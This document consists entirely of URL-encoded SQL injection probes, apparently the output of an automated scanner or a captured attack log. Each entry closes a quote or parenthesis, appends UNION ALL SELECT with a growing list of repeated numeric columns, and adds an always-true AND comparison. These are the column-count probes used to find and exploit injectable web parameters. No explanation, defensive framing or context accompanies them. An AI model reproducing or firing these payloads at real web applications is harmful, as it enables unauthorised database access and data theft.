-8883%27%20UNION%20ALL%20SELECT%206003%2C%206003%2C%206003%2C%206003%2C%206003%2C%206003%2C%206003%2C%206003%2C%206003%2C%206003%2C%206003%2C%206003%2C%206003%2C%206003%2C%206003%2C%206003%2C%206003%2C%206003%2C%206003%2C%206003%2C%206003%2C%206003%2C%206003%2C%206003%2C%206003%2C%206003%2C%206003%2C%206003%2C%206003%2C%206003%2C%206003%2C%206003%2C%206003%23%20AND%20%27EQUv%27%3D%27EQUv -1911%27%20UNION%20ALL%20SELECT%208427%2C%208427%2C%208427%2C%208427%2C%208427%2C%208427%2C%208427%2C%208427%2C%208427%2C%208427%2C%208427%2C%208427%2C%208427%2C%208427%2C%208427%2C%208427%2C%208427%2C%208427%2C%208427%2C%208427%2C%208427%2C%208427%2C%208427%2C%208427%2C%208427%2C%208427%2C%208427%2C%208427%2C%208427%2C%208427%2C%208427%2C%208427%2C%208427%2C%208427%23%20AND%20%27Bwlq%27%3D%27Bwlq -9652%27%20UNION%20ALL%20SELECT%203135%2C%203135%2C%203135%2C%203135%2C%203135%2C%203135%2C%203135%2C%203135%2C%203135%2C%203135%2C%203135%2C%203135%2C%203135%2C%203135%2C%203135%2C%203135%2C%203135%2C%203135%2C%203135%2C%203135%2C%203135%2C%203135%2C%203135%2C%203135%2C%203135%2C%203135%2C%203135%2C%203135%2C%203135%2C%203135%2C%203135%2C%203135%2C%203135%2C%203135%2C%203135%23%20AND%20%27elnJ%27%3D%27elnJ -7620%27%20UNION%20ALL%20SELECT%209362%2C%209362%2C%209362%2C%209362%2C%209362%2C%209362%2C%209362%2C%209362%2C%209362%2C%209362%2C%209362%2C%209362%2C%209362%2C%209362%2C%209362%2C%209362%2C%209362%2C%209362%2C%209362%2C%209362%2C%209362%2C%209362%2C%209362%2C%209362%2C%209362%2C%209362%2C%209362%2C%209362%2C%209362%2C%209362%2C%209362%2C%209362%2C%209362%2C%209362%2C%209362%2C%209362%23%20AND%20%27xJUW%27%3D%27xJUW -5000%27%20UNION%20ALL%20SELECT%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%2C%203550%23%20AND%20%27uIMo%27%3D%27uIMo -2385%27%20UNION%20ALL%20SELECT%204912%2C%204912%2C%204912%2C%204912%2C%204912%2C%204912%2C%204912%2C%204912%2C%204912%2C%204912%2C%204912%2C%204912%2C%204912%2C%204912%2C%204912%2C%204912%2C%204912%2C%204912%2C%204912%2C%204912%2C%204912%2C%204912%2C%204912%2C%204912%2C%204912%2C%204912%2C%204912%2C%204912%2C%204912%2C%204912%2C%204912%2C%204912%2C%204912%2C%204912%2C%204912%2C%204912%2C%204912%2C%204912%23%20AND%20%27syDA%27%3D%27syDA -4150%27%20UNION%20ALL%20SELECT%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%2C%204258%23%20AND%20%27GawX%27%3D%27GawX -1546%27%20UNION%20ALL%20SELECT%207542%2C%207542%2C%207542%2C%207542%2C%207542%2C%207542%2C%207542%2C%207542%2C%207542%2C%207542%2C%207542%2C%207542%2C%207542%2C%207542%2C%207542%2C%207542%2C%207542%2C%207542%2C%207542%2C%207542%2C%207542%2C%207542%2C%207542%2C%207542%2C%207542%2C%207542%2C%207542%2C%207542%2C%207542%2C%207542%2C%207542%2C%207542%2C%207542%2C%207542%2C%207542%2C%207542%2C%207542%2C%207542%2C%207542%2C%207542%23%20AND%20%27agsZ%27%3D%27agsZ -5392%27%29%20UNION%20ALL%20SELECT%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829%2C%209829%23%20AND%20%28%27VMqb%27%20LIKE%20%27VMqb -2026%27%29%20UNION%20ALL%20SELECT%207422%2C%207422%2C%207422%2C%207422%2C%207422%2C%207422%2C%207422%2C%207422%2C%207422%2C%207422%2C%207422%2C%207422%2C%207422%2C%207422%2C%207422%2C%207422%2C%207422%2C%207422%2C%207422%2C%207422%2C%207422%2C%207422%2C%207422%2C%207422%2C%207422%2C%207422%2C%207422%2C%207422%2C%207422%2C%207422%2C%207422%2C%207422%23%20AND%20%28%27vBmu%27%20LIKE%20%27vBmu -7225%27%29%20UNION%20ALL%20SELECT%208138%2C%208138%2C%208138%2C%208138%2C%208138%2C%208138%2C%208138%2C%208138%2C%208138%2C%208138%2C%208138%2C%208138%2C%208138%2C%208138%2C%208138%2C%208138%2C%208138%2C%208138%2C%208138%2C%208138%2C%208138%2C%208138%2C%208138%2C%208138%2C%208138%2C%208138%2C%208138%2C%208138%2C%208138%2C%208138%2C%208138%2C%208138%2C%208138%23%20AND%20%28%27RcsH%27%20LIKE%20%27RcsH -5126%27%29%20UNION%20ALL%20SELECT%204134%2C%204134%2C%204134%2C%204134%2C%204134%2C%204134%2C%204134%2C%204134%2C%204134%2C%204134%2C%204134%2C%204134%2C%204134%2C%204134%2C%204134%2C%204134%2C%204134%2C%204134%2C%204134%2C%204134%2C%204134%2C%204134%2C%204134%2C%204134%2C%204134%2C%204134%2C%204134%2C%204134%2C%204134%2C%204134%2C%204134%2C%204134%2C%204134%2C%204134%23%20AND%20%28%27hAYM%27%20LIKE%20%27hAYM -3266%27%29%20UNION%20ALL%20SELECT%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%2C%207946%23%20AND%20%28%27aUhH%27%20LIKE%20%27aUhH -2856%27%29%20UNION%20ALL%20SELECT%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%2C%203698%23%20AND%20%28%27rkJi%27%20LIKE%20%27rkJi -9797%27%29%20UNION%20ALL%20SELECT%202192%2C%202192%2C%202192%2C%202192%2C%202192%2C%202192%2C%202192%2C%202192%2C%202192%2C%202192%2C%202192%2C%202192%2C%202192%2C%202192%2C%202192%2C%202192%2C%202192%2C%202192%2C%202192%2C%202192%2C%202192%2C%202192%2C%202192%2C%202192%2C%202192%2C%202192%2C%202192%2C%202192%2C%202192%2C%202192%2C%202192%2C%202192%2C%202192%2C%202192%2C%202192%2C%202192%2C%202192%23%20AND%20%28%27KBsj%27%20LIKE%20%27KBsj -7853%27%29%20UNION%20ALL%20SELECT%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%2C%204790%23%20AND%20%28%27sdiD%27%20LIKE%20%27sdiD -2280%27%29%20UNION%20ALL%20SELECT%206098%2C%206098%2C%206098%2C%206098%2C%206098%2C%206098%2C%206098%2C%206098%2C%206098%2C%206098%2C%206098%2C%206098%2C%206098%2C%206098%2C%206098%2C%206098%2C%206098%2C%206098%2C%206098%2C%206098%2C%206098%2C%206098%2C%206098%2C%206098%2C%206098%2C%206098%2C%206098%2C%206098%2C%206098%2C%206098%2C%206098%2C%206098%2C%206098%2C%206098%2C%206098%2C%206098%2C%206098%2C%206098%2C%206098%23%20AND%20%28%27EKYn%27%20LIKE%20%27EKYn -2015%27%29%20UNION%20ALL%20SELECT%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%2C%207808%23%20AND%20%28%27YeWT%27%20LIKE%20%27YeWT -8350%27%29%29%20UNION%20ALL%20SELECT%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%2C%206997%23%20AND%20%28%28%27BAlK%27%20LIKE%20%27BAlK -1914%27%29%29%20UNION%20ALL%20SELECT%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%2C%204936%23%20AND%20%28%28%27rsqq%27%20LIKE%20%27rsqq -6021%27%29%29%20UNION%20ALL%20SELECT%205114%2C%205114%2C%205114%2C%205114%2C%205114%2C%205114%2C%205114%2C%205114%2C%205114%2C%205114%2C%205114%2C%205114%2C%205114%2C%205114%2C%205114%2C%205114%2C%205114%2C%205114%2C%205114%2C%205114%2C%205114%2C%205114%2C%205114%2C%205114%2C%205114%2C%205114%2C%205114%2C%205114%2C%205114%2C%205114%2C%205114%2C%205114%2C%205114%23%20AND%20%28%28%27Feuh%27%20LIKE%20%27Feuh -7162%27%29%29%20UNION%20ALL%20SELECT%202834%2C%202834%2C%202834%2C%202834%2C%202834%2C%202834%2C%202834%2C%202834%2C%202834%2C%202834%2C%202834%2C%202834%2C%202834%2C%202834%2C%202834%2C%202834%2C%202834%2C%202834%2C%202834%2C%202834%2C%202834%2C%202834%2C%202834%2C%202834%2C%202834%2C%202834%2C%202834%2C%202834%2C%202834%2C%202834%2C%202834%2C%202834%2C%202834%2C%202834%23%20AND%20%28%28%27ZWgX%27%20LIKE%20%27ZWgX -2386%27%29%29%20UNION%20ALL%20SELECT%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%2C%205869%23%20AND%20%28%28%27VSkm%27%20LIKE%20%27VSkm -2223%27%29%29%20UNION%20ALL%20SELECT%207928%2C%207928%2C%207928%2C%207928%2C%207928%2C%207928%2C%207928%2C%207928%2C%207928%2C%207928%2C%207928%2C%207928%2C%207928%2C%207928%2C%207928%2C%207928%2C%207928%2C%207928%2C%207928%2C%207928%2C%207928%2C%207928%2C%207928%2C%207928%2C%207928%2C%207928%2C%207928%2C%207928%2C%207928%2C%207928%2C%207928%2C%207928%2C%207928%2C%207928%2C%207928%2C%207928%23%20AND%20%28%28%27WDTT%27%20LIKE%20%27WDTT -4133%27%29%29%20UNION%20ALL%20SELECT%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%23%20AND%20%28%28%27Eldh%27%20LIKE%20%27Eldh -4089%27%29%29%20UNION%20ALL%20SELECT%201674%2C%201674%2C%201674%2C%201674%2C%201674%2C%201674%2C%201674%2C%201674%2C%201674%2C%201674%2C%201674%2C%201674%2C%201674%2C%201674%2C%201674%2C%201674%2C%201674%2C%201674%2C%201674%2C%201674%2C%201674%2C%201674%2C%201674%2C%201674%2C%201674%2C%201674%2C%201674%2C%201674%2C%201674%2C%201674%2C%201674%2C%201674%2C%201674%2C%201674%2C%201674%2C%201674%2C%201674%2C%201674%23%20AND%20%28%28%27umwa%27%20LIKE%20%27umwa -3987%27%29%29%20UNION%20ALL%20SELECT%207066%2C%207066%2C%207066%2C%207066%2C%207066%2C%207066%2C%207066%2C%207066%2C%207066%2C%207066%2C%207066%2C%207066%2C%207066%2C%207066%2C%207066%2C%207066%2C%207066%2C%207066%2C%207066%2C%207066%2C%207066%2C%207066%2C%207066%2C%207066%2C%207066%2C%207066%2C%207066%2C%207066%2C%207066%2C%207066%2C%207066%2C%207066%2C%207066%2C%207066%2C%207066%2C%207066%2C%207066%2C%207066%2C%207066%23%20AND%20%28%28%27HQGz%27%20LIKE%20%27HQGz -3830%27%29%29%20UNION%20ALL%20SELECT%201072%2C%201072%2C%201072%2C%201072%2C%201072%2C%201072%2C%201072%2C%201072%2C%201072%2C%201072%2C%201072%2C%201072%2C%201072%2C%201072%2C%201072%2C%201072%2C%201072%2C%201072%2C%201072%2C%201072%2C%201072%2C%201072%2C%201072%2C%201072%2C%201072%2C%201072%2C%201072%2C%201072%2C%201072%2C%201072%2C%201072%2C%201072%2C%201072%2C%201072%2C%201072%2C%201072%2C%201072%2C%201072%2C%201072%2C%201072%23%20AND%20%28%28%27dvrz%27%20LIKE%20%27dvrz -5452%27%29%29%29%20UNION%20ALL%20SELECT%204802%2C%204802%2C%204802%2C%204802%2C%204802%2C%204802%2C%204802%2C%204802%2C%204802%2C%204802%2C%204802%2C%204802%2C%204802%2C%204802%2C%204802%2C%204802%2C%204802%2C%204802%2C%204802%2C%204802%2C%204802%2C%204802%2C%204802%2C%204802%2C%204802%2C%204802%2C%204802%2C%204802%2C%204802%2C%204802%2C%204802%23%20AND%20%28%28%28%27LFGP%27%20LIKE%20%27LFGP -3516%27%29%29%29%20UNION%20ALL%20SELECT%207294%2C%207294%2C%207294%2C%207294%2C%207294%2C%207294%2C%207294%2C%207294%2C%207294%2C%207294%2C%207294%2C%207294%2C%207294%2C%207294%2C%207294%2C%207294%2C%207294%2C%207294%2C%207294%2C%207294%2C%207294%2C%207294%2C%207294%2C%207294%2C%207294%2C%207294%2C%207294%2C%207294%2C%207294%2C%207294%2C%207294%2C%207294%23%20AND%20%28%28%28%27ItbS%27%20LIKE%20%27ItbS -9942%27%29%29%29%20UNION%20ALL%20SELECT%209315%2C%209315%2C%209315%2C%209315%2C%209315%2C%209315%2C%209315%2C%209315%2C%209315%2C%209315%2C%209315%2C%209315%2C%209315%2C%209315%2C%209315%2C%209315%2C%209315%2C%209315%2C%209315%2C%209315%2C%209315%2C%209315%2C%209315%2C%209315%2C%209315%2C%209315%2C%209315%2C%209315%2C%209315%2C%209315%2C%209315%2C%209315%2C%209315%23%20AND%20%28%28%28%27KtzD%27%20LIKE%20%27KtzD -4440%27%29%29%29%20UNION%20ALL%20SELECT%204399%2C%204399%2C%204399%2C%204399%2C%204399%2C%204399%2C%204399%2C%204399%2C%204399%2C%204399%2C%204399%2C%204399%2C%204399%2C%204399%2C%204399%2C%204399%2C%204399%2C%204399%2C%204399%2C%204399%2C%204399%2C%204399%2C%204399%2C%204399%2C%204399%2C%204399%2C%204399%2C%204399%2C%204399%2C%204399%2C%204399%2C%204399%2C%204399%2C%204399%23%20AND%20%28%28%28%27iquf%27%20LIKE%20%27iquf -9813%27%29%29%29%20UNION%20ALL%20SELECT%206176%2C%206176%2C%206176%2C%206176%2C%206176%2C%206176%2C%206176%2C%206176%2C%206176%2C%206176%2C%206176%2C%206176%2C%206176%2C%206176%2C%206176%2C%206176%2C%206176%2C%206176%2C%206176%2C%206176%2C%206176%2C%206176%2C%206176%2C%206176%2C%206176%2C%206176%2C%206176%2C%206176%2C%206176%2C%206176%2C%206176%2C%206176%2C%206176%2C%206176%2C%206176%23%20AND%20%28%28%28%27werj%27%20LIKE%20%27werj -2169%27%29%29%29%20UNION%20ALL%20SELECT%201998%2C%201998%2C%201998%2C%201998%2C%201998%2C%201998%2C%201998%2C%201998%2C%201998%2C%201998%2C%201998%2C%201998%2C%201998%2C%201998%2C%201998%2C%201998%2C%201998%2C%201998%2C%201998%2C%201998%2C%201998%2C%201998%2C%201998%2C%201998%2C%201998%2C%201998%2C%201998%2C%201998%2C%201998%2C%201998%2C%201998%2C%201998%2C%201998%2C%201998%2C%201998%2C%201998%23%20AND%20%28%28%28%27nMzb%27%20LIKE%20%27nMzb -4635%27%29%29%29%20UNION%20ALL%20SELECT%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%2C%207098%23%20AND%20%28%28%28%27Xcry%27%20LIKE%20%27Xcry -2376%27%29%29%29%20UNION%20ALL%20SELECT%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%2C%202579%23%20AND%20%28%28%28%27OLre%27%20LIKE%20%27OLre -5033%27%29%29%29%20UNION%20ALL%20SELECT%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%2C%202547%23%20AND%20%28%28%28%27QBji%27%20LIKE%20%27QBji -5401%27%29%29%29%20UNION%20ALL%20SELECT%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%23%20AND%20%28%28%28%27NMmU%27%20LIKE%20%27NMmU -8932%27%20UNION%20ALL%20SELECT%202281%2C%202281%2C%202281%2C%202281%2C%202281%2C%202281%2C%202281%2C%202281%2C%202281%2C%202281%2C%202281%2C%202281%2C%202281%2C%202281%2C%202281%2C%202281%2C%202281%2C%202281%2C%202281%2C%202281%2C%202281%2C%202281%2C%202281%2C%202281%2C%202281%2C%202281%2C%202281%2C%202281%2C%202281%2C%202281%2C%202281%23%20AND%20%27fnLU%27%20LIKE%20%27fnLU -9648%27%20UNION%20ALL%20SELECT%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%23%20AND%20%27JOaE%27%20LIKE%20%27JOaE -7610%27%20UNION%20ALL%20SELECT%201916%2C%201916%2C%201916%2C%201916%2C%201916%2C%201916%2C%201916%2C%201916%2C%201916%2C%201916%2C%201916%2C%201916%2C%201916%2C%201916%2C%201916%2C%201916%2C%201916%2C%201916%2C%201916%2C%201916%2C%201916%2C%201916%2C%201916%2C%201916%2C%201916%2C%201916%2C%201916%2C%201916%2C%201916%2C%201916%2C%201916%2C%201916%2C%201916%23%20AND%20%27Umya%27%20LIKE%20%27Umya -2416%27%20UNION%20ALL%20SELECT%204863%2C%204863%2C%204863%2C%204863%2C%204863%2C%204863%2C%204863%2C%204863%2C%204863%2C%204863%2C%204863%2C%204863%2C%204863%2C%204863%2C%204863%2C%204863%2C%204863%2C%204863%2C%204863%2C%204863%2C%204863%2C%204863%2C%204863%2C%204863%2C%204863%2C%204863%2C%204863%2C%204863%2C%204863%2C%204863%2C%204863%2C%204863%2C%204863%2C%204863%23%20AND%20%27IQhv%27%20LIKE%20%27IQhv -7441%27%20UNION%20ALL%20SELECT%207813%2C%207813%2C%207813%2C%207813%2C%207813%2C%207813%2C%207813%2C%207813%2C%207813%2C%207813%2C%207813%2C%207813%2C%207813%2C%207813%2C%207813%2C%207813%2C%207813%2C%207813%2C%207813%2C%207813%2C%207813%2C%207813%2C%207813%2C%207813%2C%207813%2C%207813%2C%207813%2C%207813%2C%207813%2C%207813%2C%207813%2C%207813%2C%207813%2C%207813%2C%207813%23%20AND%20%27RoGh%27%20LIKE%20%27RoGh -3074%27%20UNION%20ALL%20SELECT%208140%2C%208140%2C%208140%2C%208140%2C%208140%2C%208140%2C%208140%2C%208140%2C%208140%2C%208140%2C%208140%2C%208140%2C%208140%2C%208140%2C%208140%2C%208140%2C%208140%2C%208140%2C%208140%2C%208140%2C%208140%2C%208140%2C%208140%2C%208140%2C%208140%2C%208140%2C%208140%2C%208140%2C%208140%2C%208140%2C%208140%2C%208140%2C%208140%2C%208140%2C%208140%2C%208140%23%20AND%20%27sSan%27%20LIKE%20%27sSan -9687%27%20UNION%20ALL%20SELECT%206385%2C%206385%2C%206385%2C%206385%2C%206385%2C%206385%2C%206385%2C%206385%2C%206385%2C%206385%2C%206385%2C%206385%2C%206385%2C%206385%2C%206385%2C%206385%2C%206385%2C%206385%2C%206385%2C%206385%2C%206385%2C%206385%2C%206385%2C%206385%2C%206385%2C%206385%2C%206385%2C%206385%2C%206385%2C%206385%2C%206385%2C%206385%2C%206385%2C%206385%2C%206385%2C%206385%2C%206385%23%20AND%20%27vOIE%27%20LIKE%20%27vOIE -4406%27%20UNION%20ALL%20SELECT%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%23%20AND%20%27NJyi%27%20LIKE%20%27NJyi -6888%27%20UNION%20ALL%20SELECT%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%2C%202622%23%20AND%20%27HCwT%27%20LIKE%20%27HCwT -2991%27%20UNION%20ALL%20SELECT%206226%2C%206226%2C%206226%2C%206226%2C%206226%2C%206226%2C%206226%2C%206226%2C%206226%2C%206226%2C%206226%2C%206226%2C%206226%2C%206226%2C%206226%2C%206226%2C%206226%2C%206226%2C%206226%2C%206226%2C%206226%2C%206226%2C%206226%2C%206226%2C%206226%2C%206226%2C%206226%2C%206226%2C%206226%2C%206226%2C%206226%2C%206226%2C%206226%2C%206226%2C%206226%2C%206226%2C%206226%2C%206226%2C%206226%2C%206226%23%20AND%20%27VkeH%27%20LIKE%20%27VkeH -4952%22%29%20UNION%20ALL%20SELECT%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%2C%204504%23%20AND%20%28%22WnRK%22%3D%22WnRK -1856%22%29%20UNION%20ALL%20SELECT%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%23%20AND%20%28%22qXRX%22%3D%22qXRX -6958%22%29%20UNION%20ALL%20SELECT%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%23%20AND%20%28%22xTxm%22%3D%22xTxm -7744%22%29%20UNION%20ALL%20SELECT%202663%2C%202663%2C%202663%2C%202663%2C%202663%2C%202663%2C%202663%2C%202663%2C%202663%2C%202663%2C%202663%2C%202663%2C%202663%2C%202663%2C%202663%2C%202663%2C%202663%2C%202663%2C%202663%2C%202663%2C%202663%2C%202663%2C%202663%2C%202663%2C%202663%2C%202663%2C%202663%2C%202663%2C%202663%2C%202663%2C%202663%2C%202663%2C%202663%2C%202663%23%20AND%20%28%22oqSj%22%3D%22oqSj -2737%22%29%20UNION%20ALL%20SELECT%208339%2C%208339%2C%208339%2C%208339%2C%208339%2C%208339%2C%208339%2C%208339%2C%208339%2C%208339%2C%208339%2C%208339%2C%208339%2C%208339%2C%208339%2C%208339%2C%208339%2C%208339%2C%208339%2C%208339%2C%208339%2C%208339%2C%208339%2C%208339%2C%208339%2C%208339%2C%208339%2C%208339%2C%208339%2C%208339%2C%208339%2C%208339%2C%208339%2C%208339%2C%208339%23%20AND%20%28%22KtJi%22%3D%22KtJi -8480%22%29%20UNION%20ALL%20SELECT%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%2C%201041%23%20AND%20%28%22oLiR%22%3D%22oLiR -5880%22%29%20UNION%20ALL%20SELECT%201641%2C%201641%2C%201641%2C%201641%2C%201641%2C%201641%2C%201641%2C%201641%2C%201641%2C%201641%2C%201641%2C%201641%2C%201641%2C%201641%2C%201641%2C%201641%2C%201641%2C%201641%2C%201641%2C%201641%2C%201641%2C%201641%2C%201641%2C%201641%2C%201641%2C%201641%2C%201641%2C%201641%2C%201641%2C%201641%2C%201641%2C%201641%2C%201641%2C%201641%2C%201641%2C%201641%2C%201641%23%20AND%20%28%22kMbx%22%3D%22kMbx -3957%22%29%20UNION%20ALL%20SELECT%209717%2C%209717%2C%209717%2C%209717%2C%209717%2C%209717%2C%209717%2C%209717%2C%209717%2C%209717%2C%209717%2C%209717%2C%209717%2C%209717%2C%209717%2C%209717%2C%209717%2C%209717%2C%209717%2C%209717%2C%209717%2C%209717%2C%209717%2C%209717%2C%209717%2C%209717%2C%209717%2C%209717%2C%209717%2C%209717%2C%209717%2C%209717%2C%209717%2C%209717%2C%209717%2C%209717%2C%209717%2C%209717%23%20AND%20%28%22gMkt%22%3D%22gMkt 